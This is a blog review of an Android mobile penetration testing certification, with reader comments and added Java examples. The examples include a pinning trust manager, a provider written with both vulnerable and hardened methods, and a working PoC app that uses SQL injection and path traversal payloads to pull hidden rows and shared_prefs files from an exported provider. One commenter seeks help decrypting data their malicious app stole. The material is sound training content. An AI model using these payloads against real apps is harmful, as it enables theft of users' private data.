eMAPT Review – Mobile Mischief Managed

Another eLearnSecurity course down, so here comes my eMAPT review!

eMAPT Review – Introduction

Note that this review will be Android only, as that is all I had completed by the time I took the exam. The exam is now Android only, but I plan on finishing up the iOS sections in the future. I may or may not write a review for that, depending on how it goes and if anyone wants one.

I will describe the Android half of the course as best I can. That said, of all of my eLS reviews, this one will have the most negative feedback and constructive criticism. Keep my other reviews, and the high regard I hold them in, in mind when reading this though.

Course Material – Ground Work

  • Android Architecture – this was a slightly heavy introduction (for me), but a great chapter. This chapter covered a ton about how the Android universe worked in general, as well as the similarities and differences to a standard Linux OS.
  • Setting up a testing environment – this was a shorter chapter, but it helped me get my environment ready for the rest of the course.
  • Android build process – this chapter was fairly self-explanatory. That said, this chapter helped me to understand how Java code became an android application, what an APK was, and where all the files lived.

Course Material – Fundamentals

  • Reversing APKs – this chapter was where the theories started to become actions. The Reversing APKs chapter introduced most of the tools that would be used throughout the course. I had used a few of these tools before, but this laid them all out in a concise and understandable order.
  • Device Rooting – the rooting chapter was a bit of a disappointment after reading the title. This chapter covered how a device root usually occurs, and how you maintain persistence afterwards. Unfortunately, I would have loved to see a real example of a simpler root exploit and the breakdown. I understand that some of these might be overly complicated, or hard to find versions for, but that would have made this chapter awesome.
  • Android Application Fundamentals – this chapter was rough. Not in a bad sense, but this chapter was incredibly in-depth and technical. The application fundamentals covered almost everything about how applications interact with each other, the system, browsers, etc. That said, I got a ton of security ideas from this chapter, and more than I expected stuck with me. If someone could only read one chapter of this course, I’d actually probably recommend this one.

Course Material – Vulnerabilities and Exploits

  • Network Traffic – the network traffic section helped explain certificate pinning, and the different issues that can occur in the mobile SSL environment. Getting mobile apps to proxy through Burp can occasionally be a hassle, and this is the main reason. There were also a few interesting attack vectors brought up here (stealing the private keys), and an interesting lab that I’ll cover below.
  • Device and Data Security – this chapter helped solidify where files live on the device and what security features protect them. This was also the chapter that mentioned the dangers of rooting, which are important to keep in mind for personal devices. Other than that, there were a few key vulnerabilities to check for, especially on older devices.
  • Tapjacking – tapjacking is very similar to clickjacking, only on a mobile device. That said, while it is easy to fix in theory, the real solution has proven problematic.
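The Network Traffic chapter and lab revolve around certificate pinning, so here is what a pin actually is, as an added example that is not course or lab code: the pinned value is the base64 SHA-256 of the server certificate's SubjectPublicKeyInfo, checked after the normal CA chain validation. The `PINS` constant is a placeholder and the host is assumed; an app would carry the real hash for its API server.

```java
import android.util.Base64;
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Collections;
import java.util.Set;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;

/**
 * Added example (not course or exam code): SPKI pinning layered on top of the
 * platform's chain validation. Only a chain containing a certificate whose
 * public key hashes to one of PINS is accepted; an interception CA that the
 * device otherwise trusts fails at step 2 because its SPKI hash is different.
 */
public final class PinningTrustManager implements X509TrustManager {

    // Placeholder pin (assumption); replace with "sha256/" + base64(SHA-256(SPKI)) of the real server key.
    static final Set<String> PINS =
            Collections.singleton("sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=");

    private final X509TrustManager system;

    PinningTrustManager(X509TrustManager system) { this.system = system; }

    /** The platform's default trust manager, so the ordinary CA check still runs first. */
    static X509TrustManager systemTrustManager() throws Exception {
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null);
        for (TrustManager tm : tmf.getTrustManagers()) {
            if (tm instanceof X509TrustManager) return (X509TrustManager) tm;
        }
        throw new IllegalStateException("no X509TrustManager available");
    }

    /** "sha256/" + base64(SHA-256(DER-encoded SubjectPublicKeyInfo)) of one certificate. */
    static String spkiPin(X509Certificate cert) throws NoSuchAlgorithmException {
        byte[] spki = cert.getPublicKey().getEncoded();             // X.509 SPKI in DER
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(spki);
        return "sha256/" + Base64.encodeToString(digest, Base64.NO_WRAP);
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        system.checkServerTrusted(chain, authType);                 // 1. normal PKI validation
        try {
            for (X509Certificate cert : chain) {                    // 2. any cert in the chain may match a pin
                if (PINS.contains(spkiPin(cert))) return;
            }
        } catch (NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
        throw new CertificateException("certificate chain matches no pinned SPKI hash");
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        system.checkClientTrusted(chain, authType);
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() { return system.getAcceptedIssuers(); }

    /** Route every HttpsURLConnection the app opens through the pinning manager. */
    static void install() throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { new PinningTrustManager(systemTrustManager()) }, null);
        HttpsURLConnection.setDefaultSSLSocketFactory(ctx.getSocketFactory());
    }
}
```

Two practical notes. First, the check is only as strong as the place the pin lives: because `PINS` is a string inside the APK, a tester who can repackage the app can compute `spkiPin()` for their proxy's certificate and substitute that hash, which is the same outcome as deleting the check. Second, on Android 7 and later the same pin can be declared in a Network Security Config `<pin-set>` instead of code, which is harder to get wrong but is equally editable in a repackaged APK.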

Course Material – Code Analysis

  • Static Code Analysis – the static analysis section was great, and finally started to bring in some automation into the material. From what I could tell, there were a lot of things that could be discovered through static analysis. These didn’t only include vulnerabilities, but mis-configurations as well as possible attack vectors for manual testing/fuzzing. I’ve heard mixed reviews about QARK, but it was pretty neat to automatically generate a PoC binary.
  • Dynamic Code Analysis

eMAPT Review – Labs

While the eMAPT has definitely improved since version 1, there are still some problems.

  • Reversing APKs – the first lab, and this definitely got me into the course. It’s fairly easy and straightforward, but it was great exploiting my first real vulnerability on a mobile device.
  • Network Traffic – this lab was pretty interesting to show cert pinning and how to defeat it. That said, I still don’t understand why it isn’t/wasn’t possible to just overwrite the pin value with my malicious version instead of removing it entirely.
  • Device and Data Security – I wasn’t actually able to get these APKs to work properly, even with API 16.
  • Tapjacking – it was kind of neat to use QARK to automatically generate an exploit, but that’s about all I can say about this lab.
  • Static Code Analysis – this was the first lab section that I really enjoyed. Sending a fake text to myself from a fake number (see below) was pretty neat. Using web vulnerabilities like directory traversal against a mobile application was super neat, as was learning how to do it over adb. My only real problem with this section was the huge disconnect between what it was calling SQL Injection (basically just running queries against a database) and what web courses call it (injecting malicious code into the middle of queries).
  • Dynamic Code Analysis – this section was pretty neat, and had a lot of good labs. There are examples of code injection similar to a web application, log sniffing to grab poor debugging statements (a real application had passwords being sent to a log…), and a few other ways of hitting intents.
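The Static Code Analysis lab point about SQL injection versus merely running queries, and the directory traversal over adb, both come down to what an exported content provider does with caller-supplied input. The following is an added example, not a lab APK from the course: a provider under an assumed authority `com.example.notes.provider` with the injectable and traversable versions of its two entry points written next to the hardened ones. The schema and the `attachments` directory are assumptions.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

/**
 * Added example, not lab or exam code. Assumes the provider is declared in the
 * manifest with android:exported="true" and android:authorities="com.example.notes.provider",
 * and a table notes(id INTEGER PRIMARY KEY, title TEXT, body TEXT, secret INTEGER).
 */
public class NotesProvider extends ContentProvider {

    private SQLiteDatabase db;

    @Override
    public boolean onCreate() {
        SQLiteOpenHelper helper = new SQLiteOpenHelper(getContext(), "notes.db", null, 1) {
            @Override public void onCreate(SQLiteDatabase d) {
                d.execSQL("CREATE TABLE notes(id INTEGER PRIMARY KEY, title TEXT, body TEXT, secret INTEGER)");
            }
            @Override public void onUpgrade(SQLiteDatabase d, int oldV, int newV) { }
        };
        db = helper.getWritableDatabase();
        return true;
    }

    // VULNERABLE (real injection): the id segment of the URI is spliced into the SQL
    // text, so content://.../notes/1%20OR%20secret%3D1 turns the WHERE clause into
    // "secret=0 AND id=1 OR secret=1" and returns the rows the filter meant to hide.
    public Cursor queryVulnerable(Uri uri) {
        String id = uri.getLastPathSegment();
        return db.rawQuery("SELECT title, body FROM notes WHERE secret=0 AND id=" + id, null);
    }

    // HARDENED: the id travels as a bound parameter. The same "1 OR secret=1" string
    // is then compared against the id column as a value and matches nothing.
    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        String id = uri.getLastPathSegment();
        return db.rawQuery("SELECT title, body FROM notes WHERE secret=0 AND id=?", new String[] { id });
    }

    // VULNERABLE (traversal): getLastPathSegment() decodes %2F, so the single segment
    // "..%2F..%2Fshared_prefs%2Fprefs.xml" becomes "../../shared_prefs/prefs.xml" and
    // File(base, ...) happily walks out of the attachments directory.
    public ParcelFileDescriptor openFileVulnerable(Uri uri) throws FileNotFoundException {
        File base = new File(getContext().getFilesDir(), "attachments");
        File f = new File(base, uri.getLastPathSegment());
        return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // HARDENED: canonicalise both paths and refuse anything that resolved outside base.
    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) throw new FileNotFoundException("read-only provider");
        try {
            File base = new File(getContext().getFilesDir(), "attachments").getCanonicalFile();
            File f = new File(base, uri.getLastPathSegment()).getCanonicalFile();
            if (!f.getPath().startsWith(base.getPath() + File.separator)) {
                throw new FileNotFoundException("path escapes attachments directory: " + uri);
            }
            return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
        } catch (IOException e) {
            throw new FileNotFoundException(e.getMessage());
        }
    }

    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.example.note"; }
    @Override public Uri insert(Uri uri, ContentValues values) { return null; }
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) { return 0; }
    @Override public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) { return 0; }
}
```

The distinction the lab blurred is visible in the first pair: `adb shell content query --uri content://com.example.notes.provider/notes/1` against the hardened `query()` is just running a query through an exported provider, whereas the same URI with `1%20OR%20secret%3D1` as its last segment against `queryVulnerable()` changes the structure of the statement, which is what web courses mean by SQL injection. The same goes for `content read --uri` against the two `openFile` variants.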

eMAPT Review - Fake Text

eMAPT Review – Exam

The eMAPT exam was different from any other eLearnSecurity course that I’ve taken.

You do not submit a penetration testing report for this course, like you do with the others.

For the eMAPT exam, you are given a vulnerable Android application. From there you are to discover all the vulnerabilities and write a PoC Android application that exploits them.

Finding the vulnerabilities themselves took about 3-4 minutes, which felt great. That said, as a whole, the exam felt more at home in a Java class that I would have taken in the past. I spent most of the 3-4 hours that the exam took reading the Java API and remembering syntax.

In the end, my application was pretty neat (and worked), but I didn’t feel like a penetration tester of the application. From what I’ve seen in the industry, testers perform mobile tests similarly to web application engagements. You get the application, look for all vulnerabilities, and write up a report. I’ve never had a colleague just write a PoC Android application and send that to a client in lieu of a report. Other than that, while the course suggests that one learn Java to better understand the applications, the material should clearly state that students will be programming.
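Since the exam deliverable is a PoC application rather than a report, here is the shape such an app takes, as an added example written for this review and not the exam application or its target: an Activity with no permissions that exploits an exported provider with the two weaknesses discussed in the labs section. The authority `com.example.notes.provider`, the `/notes/` and `/files/` paths and the `shared_prefs` file name are all assumptions, and the findings go to logcat under the tag `PoC`.

```java
import android.app.Activity;
import android.content.ContentResolver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

/**
 * Added example of the exam's PoC-app format; not the exam application.
 * Targets an assumed exported provider whose query() splices the id segment
 * into SQL and whose openFile() joins the last path segment onto a directory.
 * Collect results with: adb logcat -s PoC
 */
public class PocActivity extends Activity {
    private static final String TAG = "PoC";
    private static final String AUTHORITY = "com.example.notes.provider";   // assumed authority

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        ContentResolver cr = getContentResolver();
        dumpSecretNotes(cr);
        // One encoded segment: the provider decodes %2F back into '/' after splitting the path.
        readAppFile(cr, "..%2F..%2Fshared_prefs%2Fnotes_prefs.xml");   // assumed prefs file name
    }

    /** SQL injection through the id segment that the provider concatenates into its WHERE clause. */
    static void dumpSecretNotes(ContentResolver cr) {
        // Uri.encode() keeps "1 OR secret=1" as a single path segment (%20 and %3D).
        Uri target = Uri.parse("content://" + AUTHORITY + "/notes/" + Uri.encode("1 OR secret=1"));
        try (Cursor c = cr.query(target, null, null, null, null)) {
            if (c == null) { Log.e(TAG, "provider returned no cursor for " + target); return; }
            int rows = 0;
            while (c.moveToNext()) {
                rows++;
                Log.i(TAG, "note: " + c.getString(0) + " / " + c.getString(1));
            }
            Log.i(TAG, rows + " rows returned (hidden rows included if the id was injectable)");
        } catch (SecurityException e) {
            Log.e(TAG, "provider not reachable without a permission: " + e);
        }
    }

    /** Path traversal through openFile(): the provider builds File(base, ourSegment) unchecked. */
    static void readAppFile(ContentResolver cr, String encodedSegment) {
        Uri target = Uri.parse("content://" + AUTHORITY + "/files/" + encodedSegment);
        try (InputStream in = cr.openInputStream(target);
             BufferedReader r = new BufferedReader(new InputStreamReader(in))) {
            String line;
            while ((line = r.readLine()) != null) Log.i(TAG, "file: " + line);
        } catch (Exception e) {
            // FileNotFoundException here is what a hardened openFile() produces for this URI.
            Log.e(TAG, "open failed for " + target + ": " + e);
        }
    }
}
```

The PoC needs no permissions of its own because the target provider is exported, which is the point the exam is making; the check is that the same two calls fail with a `FileNotFoundException` or an empty cursor against a provider that binds its parameters and canonicalises its paths. If the PoC is ever built against API 30 or later, it additionally needs a `<queries>` entry for the target authority in its manifest or the provider is invisible to it.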

eMAPT Review – Conclusion

Since I already got my feedback, I’m just waiting on the physical cert to arrive!

eMAPT Review - Passed

While I did have a few negative things to say about the course, I still really enjoyed it.

This was an interesting course, and my first real foray into the world of mobile exploitation. I may pick up The Mobile Application Hacker’s Handbook in the future to brush up and learn even more.

In the end though, I’m not terribly motivated to continue with mobile exploitation or research at this time. I think the lack of interest is because of my interaction and feelings towards the discipline, but the course also didn’t get me as excited as some of the earlier ones have.

All in all, this was a good course, but reminiscent of the eCPPT in its early days. Once it goes through one more iteration or so, it will be able to stand toe to toe with the rest of eLearnSecurity’s offerings. Until then, it is a good class in its own right, as long as you don’t compare it to some of their other courses.

Up next for me is the eCRE once I finish my GXPN course and exam!

17 Comments

  1. Great review as usual! I have the bundle which includes this cert/course as well. Seems like you really have to be a programmer for this cert.

    • Thanks, and good luck!

      You don’t have to be a programmer per-se, but you’re definitely going to have to write code to pass the exam. I think someone can still do it, but you’ll have to modify the examples and read a bit about Android development. That said, I tried to make mine be a half decent application because of my programming background.

  2. Hi, thanks for the great review! I’m about to start the certification exam, but without the correlated course. I have some experience in mobile PT, but from what I’ve seen the vulnerable application will contain only vulnerabilities exploitable from another APK, right? Do you know any online resources with a comprehensive list of these vulnerabilities to search for?

    Thanks in advance!

    • Hi Pier, that’s awesome, and good luck!

      As far as the vulnerabilities are concerned, they will be from your standard lists like OWASP Mobile.

      If you are familiar with mobile pentesting, then you may be fine. That said, it will also take some development work for your own APK, but that isn’t covered a ton in the course anyway.

  3. Hi Ray,

    I have finished all the android modules and thinking to take exam. What should I prepare for exam? How to know if I am ready to take exam?

    Thanks

    • If you’ve finished the Android modules, then you should be good to go for the exam.

      The course covers everything that you will need, other than MAYBE some development experience. That said, 100% of what you’ll need to write is an easy Google search away.

      Good luck!

      • Hi Ray,

        Took the exam recently. I failed the exam and it is tough for me. I don’t have a background in Java programming, and it is not easy to build an Android application. I have over 2 years of pentest security consulting experience and, as you mentioned, I never had a client who wanted an Android exploit PoC app. Overall, I like the course materials very well. However, the main drawback of this course is the exam, which is not realistic, and it should have been mentioned that there will be only programming.

        • Yea, I agree that I’ve never had to write a PoC app myself. That said, I was able to Google my way through all of the Android development, as I had never done it before either.

          It doesn’t have to be the prettiest app, it just has to work. I’m not sure why the exam is in that format though, as giving a report similar to the eCPPT etc. would make more sense.

          Good luck on your next attempt!

  4. dear Ray,
    I am trying to retrieve a file and data from a database of an application through my malicious application. Now the file and the password are encrypted and I need to display them in plain text. I have been able to get the encrypted file to display in my app but can’t decrypt it. I am also still working on getting the text in the database. Can you assist me on how to go about this?

  5. In my opinion, the eMAPT course was an absolute waste of time and money!

    1. It is completely outdated: The labs are so old, they cannot be compiled with a recent Android Studio version. Some of the examples only work with API version 17, which was released in 2012. Your exam app needs to target API 24, which was released in 2016. It is an unnecessary hurdle to make students downgrade their environment, only so the examiner won’t have to update their emulator.
    Modern vulnerabilities like XSS on webviews were not part of the course.
    The iOS tools and techniques are also hopelessly outdated. Current jailbreaks no longer support Cycript. There is no word about Frida.

    2. It is not useful: The course expects you to learn how to write an Android application, but doesn’t teach you how to do that.

    3. It’s not realistic: No mobile app pentester writes their own malicious apps to prove a point. The attacks in this course can be done much quicker in Drozer.

    4. The video materials are sloppy; the guy clicks around, trying to remember where the settings were.

    • While a bit harsh, I don’t completely disagree with you.

      1 – Yea, they were pretty out-of-date, which I thought was weird.

      2 – This was the ABSOLUTE worst part of the exam/course, and I’ve brought it up with executives.

      3 – Haha, completely agreed, I don’t know if they touched on Drozer or not. I know I used it for my exam though.

      4 – Eh, this can happen, and I don’t remember it being TOO horrible. That said, they have a ton of room for a huge v2 upgrade here.

  6. Hi Doyler,

    I have a big doubt. You need to exploit all the vulnerabilities that are into the app, using a PoC? or for example, you only have to exploit an exported activity and not all that you found.

    Thank you!

    • You need to exploit the vulnerabilities IN the provided application, but using an Android app that you also develop yourself.

      And yea, you need to exploit any and all vulnerabilities that you find, just like an actual test.

  7. Hello,

    what version of android studio did you use to compile in api-24? the current ones generate an error and ask for a lot of changes in the versions of dependencies.

    • I probably used whatever was the newest version at the time. If the course material calls out a specific Studio or SDK version, you’ll want to use that.
